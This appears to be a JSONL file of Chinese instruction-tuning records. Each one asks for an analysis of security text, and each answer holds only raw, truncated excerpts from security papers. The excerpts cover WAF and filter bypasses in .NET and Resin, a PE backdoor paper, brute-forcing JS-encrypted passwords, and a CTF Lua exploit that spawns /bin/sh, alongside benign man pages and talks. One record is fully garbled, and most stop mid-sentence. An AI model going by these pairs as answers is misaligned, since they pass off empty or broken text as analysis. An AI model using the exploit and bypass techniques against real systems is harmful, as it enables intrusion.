{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 OLONLNOV-从.NET源码看件上传绕waf @我是killer .NET般使 context.Request.Files 来处理件上传编写如下代码测试 跟件上传处理流程 C# 复制代码 using System.Web; namespace WebApplication1 { public class Handler1 : IHttpHandler { public void ProcessRequest(HttpContext context) { context.Response.ContentType = \"text/plain\"; HttpPostedFile file = context.Request.Files[\"file_upload\"]; string filePath = context.Server.MapPath(\"~/test/\") + System.IO.Path.GetFileName(file.FileName); file.SaveAs(filePath); context.Response.Write(filePath); } public bool IsReusable { get { return false; } } } } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 2 跟 System.Web.HttpRequest.EnsureFiles 跟 System.Web.HttpRequest.FillInFilesCollection 3 第个红框处判断了我们的Content-Type是否以 multipart/form-data 开头 第个红框处以及在获取件相关的东了说明已经解析完了说明解析的地在箭头处 于是跟 System.Web.HttpRequest.GetMultipartContent GetAttributeFromHeader 代码如下 4 C# 复制代码 private static string GetAttributeFromHeader(string headerValue, string attrName) { if (headerValue == null) return (string) null; int length1 = headerValue.Length; int length2 = attrName.Length; int startIndex; for (startIndex = 1; startIndex < length1; startIndex += length2) { startIndex = CultureInfo.InvariantCulture.CompareInfo.IndexOf(headerValue, attrName, startIndex, CompareOptions.IgnoreCase); if (startIndex >= 0 && startIndex + length2 < length1) { char c1 = headerValue[startIndex - 1]; char c2 = headerValue[startIndex + length2]; if ((c1 == ';' || c1 == ',' || char.IsWhiteSpace(c1)) && (c2 == '=' || char.IsWhiteSpace(c2))) break; } else break; } if (startIndex < 0 || startIndex >= length1) return (string) null; int index1 = startIndex + length2; while (index1 < length1 && char.IsWhiteSpace(headerValue[index1])) ++index1; if (index1 >= length1 || headerValue[index1] != '=') return (string) null; int num1 = index1 + 1; while (num1 < length1 && char.IsWhiteSpace(headerValue[num1])) ++num1; if (num1 >= length1) return (string) null; string attributeFromHeader; if (num1 < length1 && headerValue[num1] ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 js加密爆破技巧 js格式化然后下断点 source下断点找到加密算法位置通过console批量加密 2 弄这个加上明便搜索 sublime批量格式化密码 JavaScript 复制代码 let pwds = [\"123456\", \"111111\"]; for (let pwd of pwds) { let encrypt = o.encrypt(i.MD5(pwd).toString()); console.log(\"pwd: %s;encrypt text: $$encrypt$$%s$$encrypt$$; \", pwd, encrypt); }; 1 2 3 4 5 6 3 JavaScript 复制代码 (.*) 替换 \"\\1\", 1 2 3 4 全选复制提取表达式 JavaScript 复制代码 # 提取第次 \\$\\$encrypt\\$\\$(.*?)\\$\\$encrypt\\$\\$ # 第次去掉encrypt分隔符 \\$\\$encrypt\\$\\$(.*?)\\$\\$encrypt\\$\\$ replace \\1 1 2 3 4 5 6 7", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n!\"#$%&%' ()*+'\",'$-+'' ./$\"0%$+1'(+1'2+%0' !\"#$\"%&'()*+%' ,\"-./0\"+%$\"12%-' !\"#$\"%#&' ! !\"#$%&'()*+ ! ,'&-\")\"+ ! ./0-&/1(-2*+!'-0+ ! 3'0-42567'/-\"-/')+ ! !28\"9/'&+:'*/;#\"-/')+ ! <02&+=)-2&>\"#2+ ?8/0+@'&$+@\"0+A\"*2+6'00/172+-8&'(%8+.BC3BD0+ ,E12&+F\"0-+?&\"#$+6&'%&\"AG+ ()*+'+)%,'+*-.'%,'/0+' ! H'-+\"+,'&-\")\"+-(-'&/\"7++ ! I'A2+>2\"-(&20+\"&2+0$/662*+2)-/&27E+ ! B)+2567'&\"-/')+'>+-82+0'>-@\"&2+\"%2)-+ 6&'%&\"AA/)%+6\"&\"*/%A+ \" ?8/0+/0+0\"*+ \" !2#\"(02+/-+/0+>()+ \" #+ 102*34,'50*-,' ! .2A')0-\"-2+@8\"-+,'&-\")\"+#\")+*'+ ! ,'92&+A\"J'&+>()#-/')\"7/-E+ ! K)#'(&\"%2+E'(+-'+-&E+/-G+ 6/+$0278+%0/9':*;)*#-'<72=#' ! F'&A2&7EL+=C,+M\":2C+ ! .2927'62&L+J=C,//+=C,+,7/2)-+ ! .2927'62&L+I7226+I#&/6-/)%+M\")%(\"%2+ ! .2927'62&L+B&A/-\"%2+ ! F'()*2&L+I-&\"-2%/#+,E12&+MM,+ 6/+$0278+%0/9'>6:?%%' 6/+$0278+%0/9'@-##;' ! 32&7+/)06/&2*+0E)-\"5+ ! !(/7-+')+N\"9\"+ ! K5-2)0/172+ ! IA\"77O+PQRSTU!V+ ! KA12**2*+/)+J=C,//+ 6/+$0278+%0/9'A$B%+*=#' A$B%+*=#'?0--*C0$*+%0/' ?0$+*/*9'()*+'%,'%+D' ! B+I#&/6-/)%+M\")%(\"%2+-'W+ \" B(-'A\"-2+:2-\"067'/-+F&\"A2@'&$+ \" K5-2)*+B&A/-\"%2+ ?0$+*/*9'()*+'%,'%+D' 1)#'@0E+&*$#'A=#/+'F#/,#G' ! ,'&-\")\"+/0+\"+*'A\"/)4062#/;#+7\")%(\"%2+-'+*2927'6+ XB%2)-0Y+-8\"-+#')*(#-+#E12&+'62&\"-/')0Z+ ! ?2\"A+02&92&+6&'9/*20+*/0-&/1(-2*+#'AA()/#\"-/')++ ! :2-\"067'/-+'[2&0+#\"6\"1/7/-/20+\")*+*\"-\"+A'*27+ ! ,'&-\")\"+'[2&0+A2\")0+-'+#&2\"-2+7')%+&())/)%+\"%2)-0+ -8\"-+62&#2/92+#')-25-+\")*+&206')*+-'+/-G++ ! ,'&-\")\"+\"70'+6&'9/*20+-''70+-'+*21(%L+()*2&0-\")*L+ \")*+\"00(&2+6'0/-/92+#')-&'7+'>+\"%2)-0+ ?0$+*/*9'()*+'%+'20#,' ! :2-\"067'/-+,')-&'7+ ! .\"-\"+:\")\"%2A2)-+ ! 3'0-4K567'/-\"-/')+ ! ?2\"A+I2&92&+3\"&-/#/6\"-/')+ ! :'*/>E+B&A/-\"%2+!28\"9/'&+ ! K5-2)*+B&A/-\"%2+<02&+=)-2&>\"#2+ ?0$+*/*9'A-+#$/*+%\"#,' ! K5-2)*+:2-\"067'/-+F&\"A2@'&$++ \" :'*(720+ \" 37(%/)0+ \" C,+;720+ ! :2-\"067'/-+C3,+I2&92&+ ! A0>#7/+ 3)*$#)4/$+1'5\"$*' H$0C-#BIII' ! N'77EW+=-D*+12+)/#2+/>+-82&2+@\"0+\"+@\"E+-'+$)'@+ @82)+)2@+8'0-0\\02&9/#20+6'6+(6+ ! ,8&/0W+=DA+#')0-\")-7E+&())/)%+0#\")0L+=D77+6(-+-82+ *\"-\"+@82&2+292&+E'(+7/$2Z+ ! :2W+=+-8/)$+=+#\")+8276Z+ ! ,8&/0W+=+*')D-+@\")-+-'+", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 公开访问 --- ## 在阿里云上创建 RDS 公开访问 使用以下命令为 RDS 启用公开访问 ```bash cf alibaba rds public ``` ### 查看已经公开的信息 加上 ls 列出配置过的公开访问信息 ```bash cf alibaba rds public ls ``` ### 取消公开共享 加上 cancel 取消公开访问 ```bash cf alibaba rds public cancel ``` <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2023 年 7 月 1 日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSECURITY PAPER Preparation Date: 11 Dec 2016 Art of Anti Detection  2 PE Backdoor Manufacturing Prepared by: Ege BALCI Penetration Tester ege.balci<at>invictuseurope.com INVICTUS 2 Security Paper TABLE OF CONTENT 1. Abstract:.....................................................................................................................................................3 2. Introduction.............................................................................................................................................. 3 3. Terminology..............................................................................................................................................3 4. Main Methods...........................................................................................................................................4 5. Available Space Problem.......................................................................................................................5 6. Hijacking Execution Flow....................................................................................................................10 7. Injecting Backdoor Code.....................................................................................................................14 8. Restoring Execution Flow.................................................................................................................. 17 9. Conclusion...............................................................................................................................................18 10. References:...........................................................................................................................................20 INVICTUS 3 Security Paper 1. Abstract: This paper will explain several methods used for placing backdoors in PE(Portable Executable) files for red team purposes, in order to fully grasp the content of this paper, readers needs to have at least interm", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n展望NEW GEN SOC Elaine Ma| Cybersecurity Head CHN-Region Security 简述SOC SOC的趋势 不仅仅是运维云即是未来的终端安全 展望AI 赋能 SOC 即是云运维 角色 流程 管理 技术 SOC平台目标功能架构  数据发布层对SOC平台采集分析的数据进行统一呈 现同时对专业安全子系统以B/S方式统一纳入SOC平 台进行管理并通过统一门户和统一认证实现多个专 业安全子系统的单点登录和集中授权管理  安全事件处理层主要包括对安全对象的管理安 全风险的呈现和处理安全事件和脆弱性的关联以 及对事件脆弱性完整性等安全信息的处理功能 同时提供策略库统一规划网络相关策略提供知识 库作为安全人员处理事件的参考  数据采集层主要负责对安全事件安全脆弱性等 安全信息的收集  协议服务层针对网络中多种事件源事件采集接 口需要提供多种采集方式对安全事件进行采集  安全对象层SOC平台所管理的资产包括主机 网络设备数据库管理系统安全设备如防火墙 IDS/IPS等应用系统数据和信息多个安全对 象构成的安全对象组等  应用接口层SOC平台是一个综合管理系统在对 相关安全信息进行处理时需要通过应用接口层与 其他应用管理系统之间进行数据交互应用接口层 包括与电子工单系统接口网管系统接口安全业 务接口等 SIEM 以及未来趋势---迭代 网络入侵检测和防御系统NIDPS和端点保护平台EPP等典型的预防技术之外SOC还应利用广泛的技术堆栈 来提供安全信息收集分析和事件管理功能安全信息和事件管理SIEM解决方案是最常见的平台是SOC的核 心技术端点检测和响应EDR解决方案越来越多地添加到SOC武器库中用于收集主机级监控数据便于实 时响应和取证溯源目的还有另外一种高级分析和威胁检测工具可以整合进SOC工具集中那便是网络流量分析 NTA解决方案该工具通常用于调查警报并获取有关网络中可疑活动的其他上下文 SIEM 以及未来趋势  事件管理模块应该能够查看所有的事件包括高风险 事件低风险事件可以查看历史事件可以查看实 时事件  系统应该把事件按照不同的安全对象来源进行分类 例如可以分为UNIX主机WINDOWS主机路由器 和交换机防火墙NIDS等类  可以对历史事件进行查询例如针对具体设备某个 IP地址查询它在一定时期内的所有事件或者根据 事件的关键词查询所有的事件信息  可以查看所有的实时事件考虑到实时事件的数量巨 大模块应该提供过滤功能在屏幕上只显示符合过 滤条件的事件过滤条件用户可以自定义定义好的 过滤规则能够保存在系统内下次登录系统后还可以 使用  应可以依据设定的审计策略对标准化的安全事件进行 审计分析基于审计策略对接收到的安全事件进行实 时审计每条审计事件依次匹配审计策略如果匹配 到某设计策略系统负责完成该策略的响应动作 云以及云安全运维的维度 2021-2025 发展最快的IT security 技术 为什么Cloud就是未来的端点安全 37% 41% 60% 115% 164% 0% 50% 100% 150% 200% 事件响应 威胁情报 风险管理 云安全 应用开发安全 上升率 上升率 AI 元素和驱动 算法 ANN 人工神经网 络 ML DL 概率图形 等等. 计算力 GPU TPU 张量处理单元 谷歌工作负载 AIaaS FPGA 现场可编程 门阵列强于GPU 等等. 数据 工业数据 个人数据 等等. 3个主要驱动力 主要国家的AI战略 中国 2017年新 一代人工智能发 展规划从战 略态势总体要 求资源配置 立法组织等进 行AI发展规划的 阐述建立AI 标准体系 美国. 2016年美国发 布美国国家人 工智能研究与发 展战略规划研 究开发人工智 能写作方法解 决人工智能的安 全到的 法律 和社会影响 欧盟 欧盟委员会发布 欧盟人工智能 报告建立欧洲 人工智能联盟 欧盟最新AI监管 草案 四月23号 2021 日韩 2016年日本提 出超智能社会 5.0 战略 韩国审议通过人 工智能研发战略 Standards ISO/IEC JTC1  ISO/IEC TR 24027信息技术人工智能人工智能系统中的偏差 与人工智能辅助决策  TR 24028信息技术人工智能人工智能可信度概述  TR 24029-1人工智能神 经网络鲁棒性评估第 1 部分概述  AWI 24029-2人工智能神经网络鲁棒性评估第 2 部分形式化方 法  CD23894信息技术人工智能风险管理  AWI TR 24368信息技术人工智能伦理和社会关注概述 ITU-T ITU-T 一直致力于解决智慧医疗智能汽车垃圾内容治理生物特征识别等人工智能应用中的安全 问题2017 年和 2018 年ITU-T 均组织了AI for Go", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHUNT @jhaddix @swagnetow @FatihEgbatan @digitalwoot @_Sha128 @bugcrowd Data Driven Web Hacking & Manual Testing Contribs Motley crew at @bugcrowd  SecOps & Security Engineering groups  Bughunters, Pentesters, Code Analysis, ++  Burp Suite fans The Problem(z) 1. Increasingly large and complicated Web Applications. Need manual testing 2. Applications Assessment Training lacks tribal knowledge of vulnerability location 3. No in-tool workflow for web hacking methodologies Current Solutions 1. Badass hacker who can eyeball and effectively find security bugs a. May or may not have a methodology b. Definitely has accrued tribal knowledge c. Bughunts and/or does consultant work 2. Dynamic Scanner a. Limited test cases (fuzzing) b. Cost prohibitive c. Limited in detection cases (dynamic pages, errors, etc) d. Complex sites are hard (auth) HUNT Manual testing references in Burp Methodology in Burp Tribal knowledge passive alerts HUNT Burp Suite Extension Tool Flow IScannerCheck & IScanIssue Scanner Burp Implementation (Python) Burp Tab Hunt - Scanner def doPassiveScan(self, request_response): raw_request = request_response.getRequest() raw_response = request_response.getResponse() request = self.helpers.analyzeRequest(raw_request) response = self.helpers.analyzeResponse(raw_response) parameters = request.getParameters() url = self.helpers.analyzeRequest(request_response).getUrl() vuln_parameters = self.issues.check_parameters(self.helpers, parameters) is_not_empty = len(vuln_parameters) > 0 if is_not_empty: self.issues.create_scanner_issues(self.view, self.callbacks, self.helpers, vuln_parameters, request_response) # Do not show any Bugcrowd found issues in the Scanner window return [] IExtensionStateListener, IContextMenuFactory, ITab Methodology Burp Implementation (Python) Burp Tab HUNT - Methodology def createMenuItems(self, invocation): # Do not create a menu item unless getting a context menu from the proxy history or scanner results is_proxy_history = invocation.getInv", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nXCTF WP AuthorNu1L Team wpWP NaNroot@nu1l.com 2.0 Nu1L XCTF WP lua BLSMPS babyjail babybaes hardstack house of pig hello arm dngs2010 warmupcms GSA apk Dubbo space lamaba 3*3 babydebug easycms spider coturn lua local bit_band = bit.band local bit_lshift = bit.lshift local bit_rshift = bit.rshift local math_floor = math.floor local math_frexp = math.frexp local math_ldexp = math.ldexp local math_huge = math.huge function UInt32sToDouble(low, high) local negative = false if high >= 0x80000000 then negative = true high = high - 0x80000000 end local biasedExponent = bit_rshift(bit_band(high, 0x7FF00000), 20) local mantissa = (bit_band(high, 0x000FFFFF) * 4294967296 + low) / 2  52 local f if biasedExponent == 0x0000 then f = mantissa == 0 and 0 or math_ldexp(mantissa, -1022) elseif biasedExponent == 0x07FF then f = mantissa == 0 and math_huge or(math_huge - math_huge) else f = math_ldexp(1 + mantissa, biasedExponent - 1023) end return negative and -f or f end function encode(value) code = '' i = 4 while i~=0 do code = code .. string.char(value%256) value = value/256 i = i-1 end return code end local function a() while(1) do end return 1 end -- 0x40000000 44D7D0 -- 6764A0 local fake = \"\\xd0\\xd7\\x44\\x00\\xd0\\xd7\\x44\\x00\\xd0\\xd7\\x44\\x00\\xd0\\xd7\\x44\\x00sh\\x00\\x00\\x00\\x00\\x00 \\x00\"..encode(0x044D7E2)..encode(0x044D7E2)..encode(0x044D7E2) local fa = tonumber( string.format( \"%p\", fake ), 16 )+ 32 print(encode(fa)) -- 0x451313 451309 local str = \"sh\\x00\\x00\\x00\\x00\\x00\\x40\"..encode(fa)..encode(fa-1000)..encode(fa- 1000)..\"\\x00\\x00\\x00\\x00\"..encode(0x451309)..\"\\x00\\x00\\x00\\x00\"..encode(0x451313)..\"\\x0 0\\x00\\x00\\x00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" print(a) local address = tonumber( string.format( \"%p\", str ), 16 )+ 24 print( tonumber( string.format( \"%p\", str ), 16 ) ) address = UInt32sToDouble( address - 8, 0 ) local func = debug.getinfo( 0, \">f\", address ).func -- print(func) func(\"/bin/sh\") BLSMPS The rogue public-key attack. https://crypto.stanford.edu/~dabo/p", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAutomated PIN Cracking Justin Engler Paul Vines Senior Security Engineer Security Engineering Intern iSEC Partners iSEC Partners  Current PIN Cracking Methods  Cracking with Robots  R2B2  C3BO  Defeating the Robots Agenda  One of the most popular ways to lock mobile devices  Commonly still only 4-digit despite ability to be longer  User chosen, so typically low-entropy PINs PIN Cracking Now  Jailbreak and Crack  Keyboard Emulation  Punish an Intern Jailbreak and Crack  Use jailbreaking/rooting exploits on the device  Bypass the lock screen with these new user capabilities  Problem: not all devices have known exploits for gaining root (and without wiping the device) Keyboard Emulation  If the device supports a keyboard attachment  Make a device that emulates a keyboard and tries all the different PIN combinations automatically  Problem: not all devices support an external keyboard being added Punish an Intern  Forcing your intern to try all 10,000 4-digit combinations will surely be more productive than anything else they could have been doing, except maybe getting coffee  Problem: Interns are universally bad at their jobs, so they might miss some of the combinations PIN Cracking with Robots  Required Abilities:  Push buttons in sequence  Remember what buttons were pushed  (Recognize success) Robotic Reconfigurable Button Basher (R2B2)  Homemade Delta Robot body  Arduino Uno brain  Total cost: < $200 Delta Robot  Designed for fast precision industrial work  Simple combination of 3 single-motor arms gives precision 3D movement with somewhat small range of motion  Fairly simple motion control Humanrobo, Wikipedia. CC-BY-SA Arduino Uno  Standard robotic hobby microcontroller board  Open source code for controlling a delta robot by Dan Royer (marginallyclever.com)  Uses serial port communication to control the movement of the robot  Easy to tweak functionality for pressing buttons instead of manufacturing  Easy to control with a Python program Modifications  The original", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploring the NFC Attack Surface Charlie Miller Managing Principal Accuvant Labs charlie.miller@accuvant.com July 13, 2012 Charlie Miller: Exploring the NFC Attack Surface Introduction 4 NFC protocols 5 Physical and RF layer 6 Initialization, Anti-Collision, and Protocol Activation layer 7 Protocol layer 7 Application layer 8 Example data capture 10 Fuzzing the NFC stack 13 Fuzzing setup 15 Fuzzing test cases 16 Results - Nexus S 18 Results - Nokia N9 25 NFC higher level code 26 Nexus S - Android 2.3.3 26 Galaxy Nexus - Android 4.0.1 28 Galaxy Nexus - Android 4.1.1 32 Nokia N9 - MeeGo 1.2 Harmattan PR1.3 33 Possible attacks 37 Android NFC Stack bug 37 Android Browser 38 N9 Bluetooth pairing 38 N9 bugs 39 Summary 41 Acknowledgements 42 Charlie Miller: Exploring the NFC Attack Surface References 43 Charlie Miller: Exploring the NFC Attack Surface Introduction Near Field Communication (NFC) has been used in mobile devices in some countries for a while, and is now emerging on mobile devices in use in the United States. This technology allows NFC-enabled devices to communicate with each other within close range, typically a few centimeters. NFC is being deployed and adopted as a way to make payments, using a mobile device to communicate credit card information to an NFC enabled terminal. It is a new, cool, technology, but as with the introduction of any new technology, the question that must be asked is what kind of impact the inclusion of this new functionality will have on the attack surface of mobile devices. In this paper we explore this question by introducing NFC and its associated protocols. Next, we describe how to fuzz the NFC protocol stack for two devices as well as provide the results of our testing. Then we see for these devices what software is built on top of the NFC stack. It turns out that through NFC, using technologies like Android Beam or NDEF content sharing, one can force some phones to parse images, videos, contacts, office documents, and even open ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Resin unicode ResinURI和参数名参数值都可以unicode代替 如图根录存在b.jsp 使http://127.0.0.1:8083/%u0062%u002e%u006a%u0073%u0070访问 注意到此处 getRequestURI() 依然为unicode编码以后的值如果项使 getRequestURI() 对路径做权限校验可使这种式绕过 在泛微上试了下这种法发现会直接爆500查看志定位报错位置 1.URI 2 WEB-INF/myclasses/weaver/security/filter/SecurityMain.class Plain Text 复制代码 Xss(Exception):sw=java.lang.IllegalArgumentException: URLDecoder: Illegal hex characters in escape (%) pattern - For input string: \"u0\" at java.net.URLDecoder.decode(URLDecoder.java:194) at java.net.URLDecoder.decode(URLDecoder.java:100) at weaver.security.core.SecurityCore.uriDecode(SecurityCore.java:8733) at weaver.security.core.SecurityCore.return404(SecurityCore.java:540) at weaver.security.filter.SecurityMain.process(SecurityMain.java:82) at sun.reflect.GeneratedMethodAccessor68.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorIm pl.java:43) at java.lang.reflect.Method.invoke(Method.java:498) at weaver.filter.SecurityFilter.doFilterInternal(SecurityFilter.java:51) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerReques tFilter.java:76) at com.caucho.server.dispatch.FilterFilterChain.doFilter(FilterFilterChain.ja va:87) at com.caucho.server.webapp.WebAppFilterChain.doFilter(WebAppFilterChain.java :187) at com.caucho.server.dispatch.ServletInvocation.service(ServletInvocation.jav a:265) at com.caucho.server.http.HttpRequest.handleRequest(HttpRequest.java:273) at com.caucho.server.port.TcpConnection.run(TcpConnection.java:682) at com.caucho.util.ThreadPool$Item.runTasks(ThreadPool.java:730) at com.caucho.util.ThreadPool$Item.run(ThreadPool.java:649) at java.lang.Thread.run(Thread.java:748) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 3 跟 return404 跟 uriDecode path为 req.getRequestURI() 如果含有%就进 URLDecoder url解码不了报错 想着能不能先unicode编码再url编码测试发现不这样只会进url解码匹配不到 Servlet跟了下Resin源码 com.caucho.server.dispatch.InvocationDecoder#normalizeUriEscape 4 如果ch == 37就进 scanUriEscape 法进解码这个37对应% Java 复制代码 private stati", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSteganography in Commonly Used HF Radio Protocols @pdogg77 @TheDukeZip pdogg  Paul / pdogg / @pdogg77  Day Job: Security Researcher at Confer Technologies Inc.  Hobby: Licensed as an amateur radio operator in 1986, ARRL VE  This is my second trip to DEF CON thedukezip  Brent / thedukezip / @thedukezip  Software & Systems Engineer (RF)  Licensed ham radio op since 2006, ARRL VE Why You Shouldn't Do This And Why We Didn't Do It On The Air FCC Regulations (Title 47  Part 97)  97.113 Prohibited transmissions. (a) No amateur station shall transmit:  (4) Music using a phone emission except as specifically provided elsewhere in this section; communications intended to facilitate a criminal act; messages encoded for the purpose of obscuring their meaning, except as otherwise provided herein; obscene or indecent words or language; or false or deceptive messages, signals or identification. How This Project Started... Final Warning Slide...  Hackers + Drinks = Project  WANC - We are not cryptographers  We are not giving cryptographic advice  You should talk to a cryptographer  If you are a cryptographer, we welcome your input What? We set out to demonstrate it was possible (or impossible) to create a:  Low Infrastructure  Long Range  Covert  Point to Point, Broadcast or Mesh  Short Message Protocol Using existing consumer radio and computer equipment, leveraging a commonly used digital mode Why?  Avoid censorship  Avoid spying  We believe you have the right to communicate without this interference  You COULD use our method to communicate, OR use similar techniques to create your own method  Or The Terrorists No Internet? Amateur radio operators have expertise in this! Amateur Radio  Many frequency bands reserved for amateur radio operators to communicate  Voice chat, digital modes...  Take a multiple choice test to get licensed  Reminder: The rules say you can't do what we're showing you... AirChat  Anonymous Lulzlabs  Encrypted communication in plain sight  Cool project with ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nrcconf === Debian Linux下的运行等级服务配置工具 ## 补充说明 **rcconf命令** 是Debian Linux下的运行等级服务配置工具用以设置在特定的运行等级下系统服务的启动配置 ### 语法 ```shell rcconf(选项) ``` ### 选项 ```shell --help打印帮助信息 --dialog使用对话命令显示菜单 --notermcheck不按照终端属性来设置窗口尺寸 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH UNLINK 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 unlink \\- 调用 unlink 函数删除指定文件 .SH 概述 \\fBunlink\\fP \\fI\\,文件\\/\\fP .br \\fBunlink\\fP \\fI\\,选项\\/\\fP .SH 描述 .\\\" Add any additional description here .PP 调用 unlink 函数删除指定的文件 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .SH 作者 由 Michael Stone 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件您可以自由修改和重新发布它在法律允许的范围内不提供任何保证 .SH 参见 \\fBunlink\\fP(2) .PP .br 完整文档请见 <https://www.gnu.org/software/coreutils/unlink> .br 或者在本地使用 info \\(aq(coreutils) unlink invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWarez Trading and Criminal Copyright Infringement Eric Goldman Marquette University Law School eric.goldman@marquette.edu http://eric_goldman.tripod.com Overview Definition of warez trading Applicable criminal laws Some prosecutions Some policy concerns The bottom line:  Warez trading has been criminalized  More warez traders will be sent to jail What is Warez Trading? Warez trading vs. commercial piracy Different types of warez traders  Warez distribution groups  Warez collectors  Warez downloaders  Abandonware enthusiasts Criminal  Infringement Willful copyright infringement committed:  for commercial advantage or private financial gain, or  by reproducing or distributing, in any 180- day period, works with a total retail value over $1,000 Punishment can be up to 5 years in prison and $250,000 fine Prosecution Elements (1) Valid copyright exists Infringement  Uploading, downloading, distribution  Evidentiary challenges  First sale doctrine  Fair use  Nature of the use  Nature of the work  Amount taken  Effect on the market Prosecution Elements (2) Willfulness  Minority view: intent to copy  Majority view: voluntary, intentional violation of a known legal duty  Good faith but incorrect belief of non- infringement  Good faith but incorrect belief of fair use  Ignorance of the law Prosecution Elements (3) Commercial advantage/financial gain  Financial gain: receipt, or expectation of receipt, of anything of value, including the receipt of other copyrighted works Retail value  $2,500 for felony, $1,000 for misdemeanor  Price of warez v. manufacturers list price Other Criminal Laws Circumvention  Circumventing  Trafficking in circumvention devices Hacking/Trespass  Unauthorized access to obtain information  Unauthorized access and causing damage Theft Trade Secret Misappropriation Copyright Management Information Integrity Prosecutions Classes of defendants  Distribution groups (Fastlane, PWA, DOD, RWZ)  Individual traders (Levy, Thornton, Baltutat, Fitzgerald)  Movie ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH PSFADDTABLE 1 \"28 Oct 1997\" \"控制台工具\" \"Linux 用户手册\" .SH NAME psfaddtable \\- 添加一个Unicode字符表到控制台字体中 .SH 总览 .B psfaddtable .I 字体文件 表文件 [输出文件] .SH 描述 .B Psfaddtable 命令融合了 .I 字体文件 提供的 .psf 格式的控制台字 体和 .I 表文件 提供的Unicode字符表, 生成一个带有嵌入字符表的 字体文件, 并将其写到 .I 输出文件 (如果该文件给出, 否则写到标 准输出). .I 字体文件 或者 .I 输出文件 都可以用单个的破折号(\\-)取 代以从标准输入读入, 但不能两者同时都是. 如果 .I 字体文件 已经 包含了一个嵌入字符表, 会被忽略. .SH 表文件格式 .I Tablefile 文件中各行可以是空白行, 或者是注释行(以 .IR # 领头), 也可以包含一串十进制数字(缺省情况), 或者包含一串八进制数字 (以 .IR 0 领头), 或包含一串十六进制数字(以 .IR 0x 领头). 各行第一个 数字指出所索引字体中的符号位置, 对于256\\-字符的字体, 该数在 0到0xff之间, 而对于512\\-字符的字体, 该数则处在0到0x1ff之间. 同一行中随后的任何一个数字都是该特有符号位置的Unicode匹配. 另外对同一个符号允许有多个行. .SH \"另见\" .BR consolechars (8), .BR psfgettable (1), .BR psfstriptable (1).", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDIY Nukeproofing: A New Dig at Data-Mining By 3AlarmLampscooter DEF CON 23 Version 0.1b @3AlarmLampscoot on twitter for updates DIY Nukeproofing: Outline  Why technologies like SILEX / AVLIS / MLIS are democratizing nuclear proliferation (FUD)  Identifying risk and requirements to mitigate it  Getting shovel-ready  Taking data-mining very literally Atomic Dominoes: Baryons to Bombs  Neutron discovered in 1932  Fissile nuclei split when hit!  ...and give off more neutrons such radiation much explosion very fission product wow Pitchblende and the Manhattan Project  Fissile material is not naturally occurring  ...but pitchblende is, with up to 20% U  Enter $26B of inflation-adjusted defense research and development during World War II Separation Anxiety  Mining and refining proved to be easy (sort of)  ...enrichment, not so much.  13,300,000kg of Silver and nothing to show for it Centrifuges proved practical...  Sort of, aside from needing 1,000s rotating near the speed of sound  Has remained defacto standard for enrichment It had some wicked deliverables...  Plutonium implosion-type  Fat Man 21kt, 14lbs Pu  Uranium gun-type  Little Boy 13kt 140lbs U Little Boy's closest survivors...  Eizo Nomura at 170m from ground zero in the basement of the Hiroshima Prefecture Fuel Rationing Union  Akiko Takakura at 300m from ground zero in Bank of Hiroshima's Vault Heating up the Cold War  Teller-Ulam devices making use of tritium  Yields as high as 50MT (USSR)  Lots of centrifuges spinning 24/7  Ultimately we find a Nash Equilibrium...  tl;dr MAD for Superpowers, why aren't all dead  A whole lot of hot glass caverns left at the Nevada 